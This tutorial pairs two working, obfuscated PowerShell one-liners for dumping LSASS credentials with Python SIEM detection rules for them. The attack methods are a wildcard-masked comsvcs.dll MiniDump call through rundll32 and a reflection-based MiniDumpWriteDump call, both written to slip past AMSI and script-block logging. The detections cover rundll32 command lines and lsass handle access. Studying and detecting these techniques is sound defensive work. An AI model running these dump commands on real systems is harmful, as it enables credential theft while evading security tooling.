Executing AMSI Bypass and LSASS Dump Attacks, and Detecting Them with a SIEM

AMSI bypass check: run the bypass file in PowerShell, then type the string 'AmsiUtils' (quotes included) at the prompt. While AMSI is active, PowerShell refuses the line with "This script contains malicious content and has been blocked by your antivirus software"; after a successful bypass the string is simply echoed back.
Method 1: LSASS dump via the MiniDump export of comsvcs.dll, invoked through rundll32. Paste the one-liner below into an elevated PowerShell session; the dump needs admin rights (SeDebugPrivilege).
The wildcards expand to C:\Windows\System32\rundll32.exe and C:\Windows\System32\comsvcs.dll, so the command rundll32 actually receives is "comsvcs.dll <entry> <lsass pid> c:\dmp.tmp full". The entry point (MiniDump, export ordinal 24 of comsvcs.dll) is written as a negative decoy number so that neither the API name nor "#24" appears in the script block. Once rundll32 exits, the dump file is EFS-encrypted with FileInfo.Encrypt().
&$env:???t??r???*2\r[t-u]???[k-l]?2* $(gi $env:???t??r???*2\c?m?[v-w]*l | % {$_.FullName }),`#-999999999999999999999999999999999999999999999999999999999999999999999999999999999976-decoy $(gps l?a?s).id c:\dmp.tmp full; Wait-Process -Id (Get-Process rundll32).id ; (Get-Item -Path c:\dmp.tmp).Encrypt()
Method 2: LSASS dump from inside PowerShell with MiniDumpWriteDump, reached through the non-public WindowsErrorReporting.NativeMethods P/Invoke wrapper that ships in System.Management.Automation. No rundll32 child process is spawned; an elevated session is still required to open the lsass handle.
1-Create a temp folder in drive C:
2-Execute the commands below in PowerShell
$S = "C:\temp"
$P = (Get-Process lsass)
$G = $P.Id
$PDP = "$S\lsass.dmp"   # dump file path; the file name is an assumption, any path under $S works
# The type and method names are split into string fragments so the literal API name never appears in the script block.
$A = [PSObject].Assembly.GetType('Syst'+'em.Manage'+'ment.Autom'+'ation.Windo'+'wsErrorRe'+'porting')
$B = $A.GetNestedType('Nativ'+'eMethods', 'Non'+'Public')
$C = [Reflection.BindingFlags] 'NonPublic, Static'
$D = $B.GetMethod('MiniDum'+'pWriteDump', $C)
$F = New-Object IO.FileStream($PDP, [IO.FileMode]::Create)
# MiniDumpWriteDump(hProcess, ProcessId, hFile, DumpType, ExceptionParam, UserStreamParam, CallbackParam); 2 = MiniDumpWithFullMemory
$R = $D.Invoke($null, @($P.Handle,$G,$F.SafeFileHandle,[UInt32] 2,[IntPtr]::Zero,[IntPtr]::Zero,[IntPtr]::Zero))
$F.Close()
if (-not $R) { Remove-Item $PDP; throw "MiniDumpWriteDump failed (is the session elevated?)" }
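Detection logic for both methods, as an added example that is not part of the original page (the rule names, the image allowlist and the Sysmon events are constructed assumptions, not captured telemetry). The point it demonstrates: the wildcard obfuscation in method 1 is expanded by PowerShell before rundll32 starts, so the child's command line still contains the real comsvcs.dll path, but the entry point is a decoy number, so a rule that looks for "MiniDump" or "#24" misses it; match on comsvcs.dll followed by any entry point instead. Method 2 never spawns a child process, so the only process-level signal is the handle to lsass.exe (Sysmon Event 10) opened with the access MiniDumpWriteDump needs.

```python
"""SIEM-style detections for the two LSASS dump methods, run over constructed Sysmon events."""
import re

# Access bits dbghelp!MiniDumpWriteDump needs on the target process.
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400
DUMP_ACCESS = PROCESS_VM_READ | PROCESS_QUERY_INFORMATION

# Hypothetical allowlist of images that legitimately open lsass.exe; tune per estate.
ALLOWED_LSASS_READERS = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}

# rundll32 must receive the real DLL path, so match comsvcs.dll followed by *any*
# entry point: an ordinal (#24 or the negative decoy form) or the MiniDump name.
COMSVCS_ENTRY_RE = re.compile(r"comsvcs\.dll\s*,?\s*(#\S+|minidump)", re.IGNORECASE)


def rule_rundll32_comsvcs(ev):
    """Sysmon Event 1: rundll32 started with comsvcs.dll plus an entry point (method 1)."""
    if ev.get("EventID") != 1:
        return None
    if not ev.get("Image", "").lower().endswith(r"\rundll32.exe"):
        return None
    if not COMSVCS_ENTRY_RE.search(ev.get("CommandLine", "")):
        return None
    return {"rule": "rundll32_comsvcs_minidump", "image": ev["Image"],
            "parent": ev.get("ParentImage", ""), "cmd": ev["CommandLine"]}


def rule_lsass_dump_access(ev):
    """Sysmon Event 10: a non-allowlisted process opens lsass.exe with VM_READ|QUERY_INFORMATION.
    Catches method 2, which dumps in-process and never spawns a child."""
    if ev.get("EventID") != 10:
        return None
    if not ev.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
        return None
    granted = int(ev.get("GrantedAccess", "0x0"), 16)
    if granted & DUMP_ACCESS != DUMP_ACCESS:
        return None
    source = ev.get("SourceImage", "")
    if source.lower() in ALLOWED_LSASS_READERS:
        return None
    return {"rule": "lsass_dump_access", "image": source, "granted": hex(granted)}


RULES = (rule_rundll32_comsvcs, rule_lsass_dump_access)


def run_detections(events):
    """Apply every rule to every event; return alerts in event order."""
    alerts = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                alerts.append(hit)
    return alerts


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
LSASS = r"C:\Windows\System32\lsass.exe"

# Constructed Sysmon events (not captured telemetry). The second event is what method 1
# looks like after PowerShell has expanded the wildcards: the obfuscation never reaches rundll32.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl"},
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe", "ParentImage": PS,
     "CommandLine": r'"C:\Windows\System32\rundll32.exe" C:\Windows\System32\comsvcs.dll #-99999-decoy 712 c:\dmp.tmp full'},
    {"EventID": 10, "SourceImage": PS, "TargetImage": LSASS, "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe", "TargetImage": LSASS, "GrantedAccess": "0x1000"},
    {"EventID": 10, "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": LSASS, "GrantedAccess": "0x1FFFFF"},
]

if __name__ == "__main__":
    for alert in run_detections(SAMPLE_EVENTS):
        print(alert)
```

Script block logging (Event 4104) records the obfuscated text of both methods, so a 4104 rule that matches "comsvcs", "MiniDump" or "MiniDumpWriteDump" fires on neither; the process-creation and process-access events above are the dependable signals.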
See the link below for a recording of the execution: lsass.dump-detection-short.mp4